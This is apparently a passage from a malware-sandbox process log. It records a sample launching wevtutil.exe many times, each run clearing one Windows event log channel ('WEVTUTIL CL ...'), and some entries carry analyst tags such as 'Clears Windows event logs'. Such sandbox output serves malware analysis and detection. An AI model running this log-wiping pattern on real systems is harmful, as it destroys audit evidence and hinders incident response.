    WEVTUTIL CL "Microsoft-Windows-FileHistory-Engine/Analytic"
    3⤵
    PID:8588
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-FileHistory-Engine/BackupLog"
    3⤵
    PID:11000
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-FileHistory-Engine/Debug"
    3⤵
    PID:6408
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-FileHistory-EventListener/Analytic"
    3⤵
    PID:7252
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-FileHistory-EventListener/Debug"
    3⤵
    PID:6776
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-FileHistory-Service/Analytic"
    3⤵
    PID:9136
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-FileHistory-Service/Debug"
    3⤵
    PID:8028
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-FileHistory-UI-Events/Analytic"
    3⤵
    PID:3688
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-FileHistory-UI-Events/Debug"
    3⤵
    PID:6644
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-FileInfoMinifilter/Operational"
    3⤵
    PID:10740
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Firewall-CPL/Diagnostic"
    3⤵
    PID:7424
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Folder Redirection/Operational"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:9316
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Forwarding/Debug"
    3⤵
    PID:6992
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Forwarding/Operational"
    3⤵
    - Clears Windows event logs
    PID:11168
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-GPIO-ClassExtension/Analytic"
    3⤵
    - Clears Windows event logs
    PID:9552
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-GenericRoaming/Admin"
    3⤵
    PID:2352
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-GroupPolicy/Operational"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:6316
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-HAL/Debug"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:10016
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-HealthCenter/Debug"
    3⤵
    PID:10688
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-HealthCenter/Performance"
    3⤵
    PID:7372
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-HealthCenterCPL/Performance"
    3⤵
    PID:7004
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-HelloForBusiness/Operational"
    3⤵
    PID:6892
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Help/Operational"
    3⤵
    PID:8532
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-HomeGroup Control Panel Performance/Diagnostic"
    3⤵
    PID:12016
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-HomeGroup Control Panel/Operational"
    3⤵
    - Clears Windows event logs
    PID:9840
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-HomeGroup Listener Service/Operational"
    3⤵
    PID:8596
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-HomeGroup Provider Service Performance/Diagnostic"
    3⤵
    PID:8288
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-HomeGroup Provider Service/Operational"
    3⤵
    PID:5408
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-HomeGroup-ListenerService"
    3⤵
    - Clears Windows event logs
    PID:8088
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-HotspotAuth/Analytic"
    3⤵
    PID:8696
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-HotspotAuth/Operational"
    3⤵
    PID:9160
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-HttpService/Log"
    3⤵
    PID:10668
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-HttpService/Trace"
    3⤵
    PID:10548
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Hyper-V-Guest-Drivers/Admin"
    3⤵
    PID:10620
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Hyper-V-Guest-Drivers/Analytic"
    3⤵
    PID:11060
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Hyper-V-Guest-Drivers/Debug"
    3⤵
    PID:9760
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Hyper-V-Guest-Drivers/Diagnose"
    3⤵
    PID:6932
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Hyper-V-Guest-Drivers/Operational"
    3⤵
    PID:8468
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Hyper-V-Hypervisor-Admin"
    3⤵
    PID:8920
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Hyper-V-Hypervisor-Analytic"
    3⤵
    PID:7580
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Hyper-V-Hypervisor-Operational"
    3⤵
    PID:7872
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Hyper-V-NETVSC/Diagnostic"
    3⤵
    PID:6472
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Hyper-V-VID-Admin"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:8604
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Hyper-V-VID-Analytic"
    3⤵
    PID:6440
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-IE-SmartScreen"
    3⤵
    PID:6528
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-IKE/Operational"
    3⤵
    PID:6680
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-IKEDBG/Debug"
    3⤵
    PID:8080
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-IME-Broker/Analytic"
    3⤵
    PID:8672
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-IME-CandidateUI/Analytic"
    3⤵
    PID:10192
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-IME-CustomerFeedbackManager/Debug"
    3⤵
    PID:10348
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-IME-CustomerFeedbackManagerUI/Analytic"
    3⤵
    PID:10796
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-IME-JPAPI/Analytic"
    3⤵
    PID:7628
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-IME-JPLMP/Analytic"
    3⤵
    PID:6228
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-IME-JPPRED/Analytic"
    3⤵
    PID:9964
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-IME-JPSetting/Analytic"
    3⤵
    PID:9548
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-IME-JPTIP/Analytic"
    3⤵
    PID:10632
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-IME-KRAPI/Analytic"
    3⤵
    PID:6496
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-IME-KRTIP/Analytic"
    3⤵
    PID:6488
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-IME-OEDCompiler/Analytic"
    3⤵
    PID:6708
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-IME-TCCORE/Analytic"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:7240
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-IME-TCTIP/Analytic"
    3⤵
    PID:8584
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-IME-TIP/Analytic"
    3⤵
    PID:7904
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-IPNAT/Diagnostic"
    3⤵
    PID:10672
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-IPSEC-SRV/Diagnostic"
    3⤵
    PID:6688
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-IPxlatCfg/Debug"
    3⤵
    PID:9412
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-IPxlatCfg/Operational"
    3⤵
    PID:7640
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-IdCtrls/Analytic"
    3⤵
    PID:9708
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-IdCtrls/Operational"
    3⤵
    PID:11312
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-IndirectDisplays-ClassExtension-Events/Diagnostic"
    3⤵
    PID:6308
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Input-HIDCLASS-Analytic"
    3⤵
    PID:11224
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-InputSwitch/Diagnostic"
    3⤵
    PID:6840
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-International-RegionalOptionsControlPanel/Operational"
    3⤵
    PID:9944
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Iphlpsvc/Debug"
    3⤵
    PID:10096
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Iphlpsvc/Operational"
    3⤵
    PID:7652
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Iphlpsvc/Trace"
    3⤵
    PID:8996
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-KdsSvc/Operational"
    3⤵
    PID:6436
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kerberos/Operational"
    3⤵
    PID:7288
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-Acpi/Diagnostic"
    3⤵
    PID:4712
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-AppCompat/General"
    3⤵
    PID:10856
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-AppCompat/Performance"
    3⤵
    PID:8120
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-ApphelpCache/Analytic"
    3⤵
    PID:8092
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-ApphelpCache/Debug"
    3⤵
    PID:9772
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-ApphelpCache/Operational"
    3⤵
    PID:6908
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-Boot/Analytic"
    3⤵
    PID:10112
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-Boot/Operational"
    3⤵
    PID:11432
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-BootDiagnostics/Diagnostic"
    3⤵
    PID:7660
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-Disk/Analytic"
    3⤵
    PID:4164
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-EventTracing/Admin"
    3⤵
    PID:10048
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-EventTracing/Analytic"
    3⤵
    PID:11212
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-File/Analytic"
    3⤵
    PID:9976
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-IO/Operational"
    3⤵
    PID:8132
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-Interrupt-Steering/Diagnostic"
    3⤵
    PID:11436
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-IoTrace/Diagnostic"
    3⤵
    PID:9836
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-LiveDump/Analytic"
    3⤵
    PID:9588
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-LiveDump/Operational"
    3⤵
    PID:12040
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-Memory/Analytic"
    3⤵
    PID:7320
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-Network/Analytic"
    3⤵
    - Clears Windows event logs
    PID:6372
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-Pdc/Diagnostic"
    3⤵
    PID:9364
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-Pep/Diagnostic"
    3⤵
    PID:11508
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-PnP/Boot Diagnostic"
    3⤵
    PID:10484
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-PnP/Configuration"
    3⤵
    PID:8960
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-PnP/Configuration Diagnostic"
    3⤵
    PID:9592
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-PnP/Device Enumeration Diagnostic"
    3⤵
    PID:10652
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-PnP/Driver Diagnostic"
    3⤵
    PID:10812
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-PnP/Driver Watchdog"
    3⤵
    PID:9572
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-Power/Diagnostic"
    3⤵
    PID:11092
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-Power/Thermal-Diagnostic"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5968
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-Power/Thermal-Operational"
    3⤵
    PID:8968
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-Prefetch/Diagnostic"
    3⤵
    PID:11460
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-Process/Analytic"
    3⤵
    PID:9132
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-Processor-Power/Diagnostic"
    3⤵
    PID:6388
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-Registry/Analytic"
    3⤵
    PID:8248
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-Registry/Performance"
    3⤵
    PID:8540
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-ShimEngine/Debug"
    3⤵
    PID:10860
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-ShimEngine/Diagnostic"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:7012
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-ShimEngine/Operational"
    3⤵
    PID:10772
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-StoreMgr/Analytic"
    3⤵
    PID:9008
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-StoreMgr/Operational"
    3⤵
    PID:280
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-WDI/Analytic"
    3⤵
    PID:7336
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-WDI/Debug"
    3⤵
    PID:10836
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-WDI/Operational"
    3⤵
    PID:6368
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-WHEA/Errors"
    3⤵
    PID:292
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-WHEA/Operational"
    3⤵
    PID:8412
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-XDV/Analytic"
    3⤵
    PID:1732
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-KeyboardFilter/Admin"
    3⤵
    PID:1596
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-KeyboardFilter/Operational"
    3⤵
    PID:11064
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-KeyboardFilter/Performance"
    3⤵
    PID:11744
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Known Folders API Service"
    3⤵
    PID:11392
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-L2NA/Diagnostic"
    3⤵
    PID:10872
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-LDAP-Client/Debug"
    3⤵
    PID:10248
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-LSA/Diagnostic"
    3⤵
    PID:11400
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-LSA/Operational"
    3⤵
    PID:276
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-LSA/Performance"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4136
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-LUA-ConsentUI/Diagnostic"
    3⤵
    PID:4168
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-LanguagePackSetup/Analytic"
    3⤵
    PID:12024
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-LanguagePackSetup/Debug"
    3⤵
    PID:872
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-LanguagePackSetup/Operational"
    3⤵
    PID:164
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-LimitsManagement/Diagnostic"
    3⤵
    PID:9196
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-LinkLayerDiscoveryProtocol/Diagnostic"
    3⤵
    PID:4500
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-LinkLayerDiscoveryProtocol/Operational"
    3⤵
    PID:11488
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-LiveId/Analytic"
    3⤵
    PID:7148
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-LiveId/Operational"
    3⤵
    PID:304
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-MPEG2-Video-Encoder-MFT_Analytic"
    3⤵
    PID:11296
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-MPS-CLNT/Diagnostic"
    3⤵
    PID:9568
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-MPS-DRV/Diagnostic"
    3⤵
    PID:11548
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-MPS-SRV/Diagnostic"
    3⤵
    PID:7984
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-MSFTEDIT/Diagnostic"
    3⤵
    PID:9028
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-MSPaint/Admin"
    3⤵
    PID:11836
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-MSPaint/Debug"
    3⤵
    PID:8328
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-MSPaint/Diagnostic"
    3⤵
    PID:12144
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-MUI/Admin"
    3⤵
    PID:1684
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-MUI/Analytic"
    3⤵
    PID:11528
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-MUI/Debug"
    3⤵
    PID:11840
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-MUI/Operational"
    3⤵
    PID:11304
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Media-Streaming/DMC"
    3⤵
    PID:6804
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Media-Streaming/DMR"
    3⤵
    PID:11596
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Media-Streaming/MDE"
    3⤵
    - Clears Windows event logs
    PID:11892
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-MediaFoundation-MFCaptureEngine/MFCaptureEngine"
    3⤵
    PID:7120
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-MediaFoundation-MFReadWrite/SinkWriter"
    3⤵
    PID:11272
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-MediaFoundation-MFReadWrite/SourceReader"
    3⤵
    PID:9816
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-MediaFoundation-MFReadWrite/Transform"
    3⤵
    PID:11800
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-MediaFoundation-Performance/SARStreamResource"
    3⤵
    PID:11884
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-MediaFoundation-PlayAPI/Analytic"
    3⤵
    PID:1860
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-MemoryDiagnostics-Results/Debug"
    3⤵
    PID:6424
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Minstore/Analytic"
    3⤵
    PID:7084
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Minstore/Debug"
    3⤵
    - Clears Windows event logs
    PID:11792
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Mobile-Broadband-Experience-Api-Internal/Analytic"
    3⤵
    PID:6400
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Mobile-Broadband-Experience-Api/Analytic"
    3⤵
    PID:11748
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Mobile-Broadband-Experience-Parser-Task/Analytic"
    3⤵
    PID:11280
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Mobile-Broadband-Experience-Parser-Task/Operational"
    3⤵
    PID:11492
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Mobile-Broadband-Experience-SmsApi/Analytic"
    3⤵
    PID:11684
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-MobilityCenter/Performance"
    3⤵
    PID:7432
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-ModernDeployment-Diagnostics-Provider/Admin"
    3⤵
    PID:11724
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-ModernDeployment-Diagnostics-Provider/Autopilot"
    3⤵
    PID:11700
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-ModernDeployment-Diagnostics-Provider/Debug"
    3⤵
    PID:11848
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-ModernDeployment-Diagnostics-Provider/ManagementService"
    3⤵
    PID:8848
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Mprddm/Operational"
    3⤵
    PID:9904
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-NCSI/Analytic"
    3⤵
    PID:7256
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-NCSI/Operational"
    3⤵
    PID:10168
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-NDF-HelperClassDiscovery/Debug"
    3⤵
    PID:10696
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-NDIS-PacketCapture/Diagnostic"
    3⤵
    PID:6836
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-NDIS/Diagnostic"
    3⤵
    PID:7836
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-NDIS/Operational"
    3⤵
    PID:10980
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-NTLM/Operational"
    3⤵
    PID:12204
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-NWiFi/Diagnostic"
    3⤵
    PID:12112
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Narrator/Diagnostic"
    3⤵
    - Clears Windows event logs
    PID:5128
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Ncasvc/Operational"
    3⤵
    PID:7636
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-NcdAutoSetup/Diagnostic"
    3⤵
    PID:11424
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-NcdAutoSetup/Operational"
    3⤵
    PID:12124
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-NdisImPlatform/Operational"
    3⤵
    PID:6816
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Ndu/Diagnostic"
    3⤵
    PID:11956
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-NetShell/Performance"
    3⤵
    PID:12080
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Network-Connection-Broker"
    3⤵
    PID:10384
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Network-DataUsage/Analytic"
    3⤵
    PID:8084
- - C:\Windows\SysWOW64\wevtutil.exe
